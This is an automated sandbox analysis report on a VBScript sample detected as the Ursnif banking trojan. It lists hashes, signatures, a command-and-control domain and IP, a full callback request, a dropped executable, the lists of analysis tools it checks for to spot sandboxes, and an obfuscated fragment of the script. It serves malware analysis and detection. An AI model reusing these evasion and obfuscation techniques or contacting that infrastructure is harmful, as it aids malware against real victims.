Analysis Report 0HsPbXmcFf1k.vbs

Overview

General Information

Sample Name: 0HsPbXmcFf1k.vbs
Analysis ID: 329550
MD5: b75cacca388f6233844e2720bc52a9cd
SHA1: de080d98e0f092175d71f15d78ca92e1665edb53
SHA256: a5b2a02293e8875977dc822c8b1ca4101c2e378463018a5b6a572be559e3abb4

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 12% Perma Link
Source: http://api10.laptok.at/favicon.ico Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Metadefender: Detection: 18% Perma Link
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Joe Sandbox ML: detected
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44 47.241.19.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTsXG/HhSGjlZAz75/MGS0M3hXIYptAx/t_2BV8CyK5tAOx9S5ETcL/RfswvYGcruz09Ttu/liLSJkBAsVxHqgz/lU4z93taaS3OdirxC8/XaU5JN3Fl/kDBJId8zKh02ccx1lAnJ/hYXmd9L_2FBIPWbwnnA/RUKF8siFTAyjQU0l65PXXn/uAbc5e9Igb03_/2Bph4va6/5CKxcM_0A_0DG5URWLIjFfc/_2BGXTJPcZ/281nTqW9aBaFUw_2F/4c_2FBISILQC/Ywr7kYPa7W2/Rgd_2BAEKFtO/GAw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca22f249,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca2554d3,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Dec 2020 17:37:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {F3DA31CA-3C22-11EB-90E4-ECF4BB862DED}.dat.26.dr String found in binary or memory: http://api10.laptok.at/api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTs
Source: msapplication.xml.26.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.26.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.26.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.26.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.26.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.26.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.26.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.26.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj CEA0B6B83210A878E1BCC0C792658CA341911E8C43FDE86524501D265C8BAE16
Java / VBScript file with very long strings (likely obfuscated code)
Source: 0HsPbXmcFf1k.vbs Initial sample: Strings found which are bigger than 50
Source: magnesia.xcodeproj.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winVBS@4/20@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb0B source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr
Source: Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(649374277)) > 0 And KPEkhN = 0) ThenExit FunctionEnd If' harbinger gigging supervene patient pink ingest Levitt Shari Manhattan sawmill elucidate171 cereus catastrophe Carolingian597 imbalance Scott avionic augment Daley proboscis Singapore mycobacteria completion listen. pamper nutrition Agee ripple stockbroker repelling appraise tube solicitous pragmatic heartland Rochester Goodwin. agone Gascony umpire megohm punk leatherwork thrifty ambiguity henceforth TV flounce clairvoyant astronomer hall icicle casework rainstorm salesman accordion. rabbinical. chive extraordinary curlew gauze Set qrkNb = GetObject("winmgmts:\\.\root\cimv2")Set PMWjUlItems = qrkNb.ExecQuery("Select * from Win32_Processor", , (182 - ((69 - 4.0) + (30 + 39.0))))' trackage posable council desire straightaway Nikko geophysics anthem beater, Dada heat jettison backstage brant screed fetus, sough gesture uremia, 1631324 woody mitre guild toponymy dusky345 alphabetic Pegasus Skippy. Rawlinson moss stripe parse Jed halma. cane. 8911536 silicic Goff pitman torr angel backfill gar46 billet, 9998939 sausage. postpone bistate nightfall inane smooth civilian, 9785974 constraint haplology Mekong knead decontrolled nimble dynamite ignore consultation equipoise For Each ZhxjBO In PMWjUlItemsREM raunchy monic raucous phosphorescent, faint Patsy inviolable floruit gs Edward honorarium epiphysis. katydid brighten abc pyrotechnic audacious counterproposal analyst doeuvre Burnside jerry Ito181 exotica. 3356268 pewter416 architectural fascicle346 swivel import cherubim807 pulley fluid soignee Barnum. strengthen storefront580 during theory rheostat Borealis Wesleyan Bologna Vernon alpaca t profile accelerate switchman buckhorn facetious eyelet mercer629 stumpy Columbus documentation collector chemistry reduce Moser bail behold buttonhole neuritis Topeka deerstalker mantis auntie Vreeland earnest. 7086757 REM copulate quirk613 armature eminent Hermite striate, horizon Permian expiration lotus concubine sagacious. erg Byzantine seek Broadway bossy, kittenish vagrant, 4130644 Tantric Gilead Harmon whatre Goldstein Heuser wardrobe giddy plague Hertzog marksmen Dahl bowmen deconvolution cessation clitoris impel dubious haggard stifle possessive, hectic peek postorder march emphases Stevenson, If ZhxjBO.NumberOfCores < ((56 + (-40.0)) + (-(1305 - (96 + 1196.0)))) ThenIVyhS = TrueEnd IfNextIf IVyhS ThenJyWHJqREM confess casino veterinary hydroxy chartreuse buzzy subsume. Darwin buteo Nazism flourish sorrel Agatha32 whereon supervisory266 seasonal firecracker diode Lauderdale psychophysic suffer jowl, Lisa sclerotic militia grantee mambo contrition Pennsylvania wysiwyg progenitor Montgomery Natchez witness TOEFL orthorhombic fate anticipatory poignant trot inflammatory bulbous sawyer sequin mutagen complimentary thymus tie. swag horseback counterclockwise headdress puffball suntanning End IfEnd FunctionFunction Kelley()If (InStr(WScript.ScriptName, "TESTING") > 0) ThenEx
PE file contains an invalid checksum
Source: magnesia.xcodeproj.0.dr Static PE information: real checksum: 0x37c70 should be: 0x37c79

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0hspbxmcff1k.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXEX
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE:@V5
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXEP
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE@T
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXE@K
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000002.250885232.000002053E1D4000.00000004.00000001.sdmp Binary or memory string: CARGILL = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXECKSA@
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5752 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
